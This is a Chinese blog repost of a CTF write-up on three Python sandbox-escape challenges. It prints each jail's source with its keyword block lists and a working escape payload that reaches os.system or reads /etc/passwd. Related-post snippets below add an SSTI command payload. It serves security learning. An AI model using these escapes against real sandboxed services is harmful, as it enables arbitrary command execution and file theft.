python沙箱逃逸的几道题

最新推荐文章于 2021-02-10 02:56:47 发布
最新推荐文章于 2021-02-10 02:56:47 发布
阅读量299 收藏
点赞数
文章标签: python php
原文链接:http://www.cnblogs.com/afanti/p/10097743.html
版权

第一道

from __future__ import print_function

print("Welcome to my Python sandbox! Enter commands below!")

banned = [
    "import",
    "exec",
    "eval",
    "pickle",
    "os",
    "subprocess",
    "kevin sucks",
    "input",
    "banned",
    "cry sum more",
    "sys"
]

targets =__builtins__.__dict__.keys()
targets.remove('raw_input')
targets.remove('print')
for x in targets:
    del __builtins__.__dict__[x]

while 1:
    print(">>>", end=' ')
    data = raw_input()

    for no in banned:
        if no.lower() in data.lower():
            print("Nobueno")
            break
    else: # this means nobreak
        exec data

payload: ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls')

第二道

#!/usr/bin/env python
from re import findall
def make_secure():
    UNSAFE = ['open',
              'file',
              'execfile',
              'compile',
              'reload',
              '__import__',
              'eval',
              'input']
    for func in UNSAFE:
        del __builtins__.__dict__[func]

# Remove dangerous builtins
make_secure()
print 'Go Ahead, Expoit me >;D'
while True:
    try:
        print ">>>",
        # Read user input until the first whitespace character
        inp = findall('\S+', raw_input())[0]
        a = None
        # Set a to the result from executing the user input
        exec 'a=' + inp
        print 'Return Value:', a
    except Exception, e:
        print 'Exception:', e

payload:().class.bases[0].subclasses()[40]("/etc/passwd").read()

前两道环境是py2,第三道是py3

第三道

# -*-coding:utf-8-*-  

#!/usr/bin/python3  
import sys, cmd, os  

del __builtins__.__dict__['__import__']  
del __builtins__.__dict__['eval']  

intro = """ 
pwnhub cuit 
pwn everything 
Rules: 
 -No import 
 -No ... 
 -No flag 

"""  

def execute(command):  
    exec(command, globals())  

class Jail(cmd.Cmd):  
 prompt     = '>>> '  
 filtered    = '\'|.|input|if|else|eval|exit|import|quit|exec|code|const|vars|str|chr|ord|local|global|join|format|replace|translate|try|except|with|content|frame|back'.split('|')  

 def do_EOF(self, line):  
     sys.exit()  

 def emptyline(self):  
     return cmd.Cmd.emptyline(self)  

 def default(self, line):  
     sys.stdout.write('\x00')  

 def postcmd(self, stop, line):  
     if any(f in line for f in self.filtered):  
         print("You are a big hacker !!!")  
         print("Go away")  
     else:  
        try:  
             execute(line)  
        except NameError:  
             print("NameError: name '%s' is not defined" % line)  
        except Exception:  
             print("Error: %s" % line)  
     return cmd.Cmd.postcmd(self, stop, line)  

if __name__ == "__main__":  
 try:  
     Jail().cmdloop(intro)  
 except KeyboardInterrupt:  
     print("\rSee you next time !")

payload:print(getattr(os, "system")("whoami"))

等有空好好看看python面向对象的那一块知识

参考链接:
http://www.php.cn/python-tutorials-356723.html
http://blog.51cto.com/13620939/2075204
https://xz.aliyun.com/t/52#toc-0
http://www.k0rz3n.com/2018/05/04/Python%20%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E5%A4%87%E5%BF%98/
http://www.bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/

转载于:https://www.cnblogs.com/afanti/p/10097743.html

weixin_30344131
关注
android沙箱逃逸漏洞,【技术分享】沙盒逃逸技术详解(一)
weixin_40004051的博客
06-01 889
预估稿费:170RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿写在前面的话在过去的十多年里,针对恶意软件沙盒逃逸技术的分析已经成为了对抗高级持续性威胁的银弹,虽然这种技术变得越来越热门,但是恶意软件的开发者们似乎也找到了一种基于静态分析的方法(例如加密、混淆处理和反逆向保护等技术)来躲避传统反病毒安全工具的检测。因此,针对恶意软件沙盒逃逸技术的分析与研究已经成为了我们抵...
Python沙箱逃逸总结
forbidd3n,keep going
07-26 2073
0x00 简介 关于Python沙箱逃逸,在多次CTF比赛中看到后,终于下定决心来进行一番学习和总结。 python沙箱逃逸:从一个受限制的python执行环境中获取到更高的权限,甚至getshell。 0x01 __builtins__ 首先我们从python的内建函数__builtins__说起。通过dir(__builtins__)可以查看内置函数,展示所有内置类型和函数。 ...
沙箱逃逸练习python源码
02-13
里面是近十道python逃逸目的python源码,在python环境中运行既可以进入目环境。 可以查看我写的沙箱逃逸的博客结合练习 https://blog.csdn.net/qq_43390703/article/details/104256001
有关沙盒逃逸的两道
playmaker的博客
06-11 1125
有关沙盒逃逸的两道目 1.BCTF-2017 Monkey 拿到目给了一个js文件,是一个模拟终端的程序。输入os.system(’/bin/sh’),即可拿到shell. 2.CUIT-2017 这就没上一那么容易。 输入os.system(’/bin/sh’)函数被检测出,应该是启用了字符串过滤 ''和.都被过滤,但是system没有过滤,此时我们可以使用getattr 来进行g...
python 利用code对象沙箱逃逸
qq_41891666的博客
09-07 443
0x 前言 最近遇到一些python 沙箱逃逸的问,突然想起之前群友发了一个关于python2 code对象沙箱逃逸的博客,然后想自己也重新回顾回顾这个方法,同时也想python2 可以利用code 对象沙箱逃逸,那么python3 可不可以呢?抱着好奇心,然后就有了这篇文章。 0x 准备知识 1.python 中利用code 对象来动态函数的几种方法【本质都是得到Function类,然后使用Fuction类的构造函数】: (1) 通过types.FunctionType 函数 python 文档中查看t
沙箱逃逸技术
jackey3Lin的专栏
11-21 9427
沙箱技术实现特点    (((本文仅仅讨论沙箱逃逸技术问,不涉及高大上的架构性问及APT防御性问,避免问的无限扩大化。))) 用沙箱动态行为分析检测malware是近几年补充传统AV杀软的通用技术,但是各厂商对沙箱的实现方式和检测方案设计不尽相同,单纯从沙箱角度看,基本分为虚拟化和仿真模拟两大类,然后会在这两种的基础上加上内存分析或者多系统多沙箱联合分析,其中云查杀,信誉,流量检测等本
python沙箱逃逸
最新发布
08-16
Python沙箱逃逸是指在运行Python代码时,绕过沙箱的限制,执行一些敏感的函数或操作。为了防止恶意用户执行任意的Python代码,沙箱通常会禁用一些敏感函数,例如os模块。通过一些技巧来逃逸沙箱的限制。 其中一种...
python沙箱逃逸小结
sectown的博客
02-27 774
之前,协会的同学去天津交流,天津大学的同学讲了一个python沙箱逃逸的案例。今天结合之前的所学和比赛经验写一个小结。 案例1这是hackuctf 2012的一道 defmake_secure(): UNSAFE = ['open', 'file', 'execfile', ...
太酷炫了!!我会Python 导包八种方法
pythonputao的博客
12-11 3107
1. 直接 import 人尽皆知的方法,直接导入即可 >>> import os >>> os.getcwd() '/home/wangbm'复制代码 与此类似的还有,不再细讲 import ... import ... as ... from ... import ... from ... import ... as ...复制代码 一般情况下,使用 import 语句导入模块已经够用的。 但是在一些特殊场景中,可能还需要其他的导入方式。 下面我会一
python沙箱逃逸一些套路的小结
Sp4rkW的博客
05-21 9917
前言 总结一下各大赛事中的沙箱逃逸,感觉还是很好玩的~ 先说一下自己对于这种沙箱逃逸的理解吧,关键在于绕过,一般就是逼你用一些特别的操作去绕过他ban掉的函数,得到flag 空说无意,我们直接来看比赛中的一些目~ 2018 ciscn(国赛)RUN 它过滤了一些危险函数,比如:os、sys等等,但我们可以通过类的继承关系找到被ban掉的库,然后将它导入进来。比如: ().__c...
各种姿势解析-python沙箱逃逸
qq_43390703的博客
09-07 2658
目录1.预备内容python中内置执行系统命令的模块:subprocessoscommandstimeitpaltformpty可执行系统命令的函数两个魔术方法python中可以执行任意代码的函数导入os或sys的库2. 沙箱逃逸花式import花式处理字符串恢复sys.modules花式执行函数通过继承关系逃逸文件读写其他3.小结/思路4.实例1. ISCC 2016 Pwn300 pycalc2.__ future _3.hackuctf 20124.future5.cuit2017payload集锦5
ssti详解与例以及绕过payload大全
热门推荐
HoAd'blog
02-10 1万+
ssti详解与例以及绕过payload大全 [BJDCTF2020]Cookie is so stable user=1231{{2*4}} 判断是不是ssti user={{system('ls')}} 执行命令,但不能成功,,好像是空格不可以 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 这是最后的payload https://0day.work/jinja2
python类方法@classmethod与@staticmethod
python学习者的博客
09-27 1514
一、@classmethod 介绍 与普通的类方法有所不同的是,用@classmethod修饰的类方法不传入self实例本身,而是传入cls,代表这个类自身,可以来调用类的属性,类的方法,实例化对象等。 语法 使用的语法也非常简单,直接在类方法上加上装饰器@classmethod即可,另外传入cls参数作为方法的第一个参数。 class A(object): @classmethod def func(cls): pass 举例 ''' 遇到问没人解答?小编创建了一个P
CTF目记录8SSTI
kkzzjx
06-04 1466
# Web_python_template_injection flask模版注入不会啊,只能面向搜索引擎,已经入土了 首先是推荐两篇好文: [1.从零学习flask模板注入
CTF python沙箱逃逸进阶
weixin_30432579的博客
01-12 607
future引用了python3的新特性,所以是不能直接回回显,得用print file函数可以读取。 print(().__class__.__bases__[0].__subclasses__()[40]('./sx2.py').read()) 读取源码后: from __future__ import print_function banned = [ "import", ...
[BJDCTF 2nd]假猪套天下第一
怪味巧克力的博客
07-16 515
0x01 拿到目进去,首页如下 我们如果以admin账号登录,会弹框提示我们不是admin 然后我们随意登录看看什么情况,结果可以登录进去,如下图 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FqDvqpgT-1594868368495)(https://img2020.cnblogs.com/blog/2010397/202007/2010397-20200716105521025-563704932.png)] 查看源码没有看到什么有价值的信息,我们重新登录抓包看
HexionCTF web&crypto&misc目分析
蚁景网安学院
05-14 1406
HexionCTF 2020 都是一些基础和中等的目,但是没有 ak,等到官方 wp (https://github.com/HexionTeam/HexionCTF-Writeups...
python沙盒逃逸
JBlock的博客
10-04 5488
记: 闲来无事,加上之前第十一届全国大学生信息安全竞赛创新能力实践赛线下赛的时候,碰见过python沙盒的目,于是乎想深入了解一下,故有此篇! 基础知识: 沙箱沙箱是一种按照安全策略限制程序行为的执行环境。早期主要用于测试可疑软件等,比如黑客们为了试用某种病毒或者不安全产品,往往可以将它们在沙箱环境中运行。   经典的沙箱系统的实现途径一般是通过拦截系统调用,监视程序行为,然后依据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值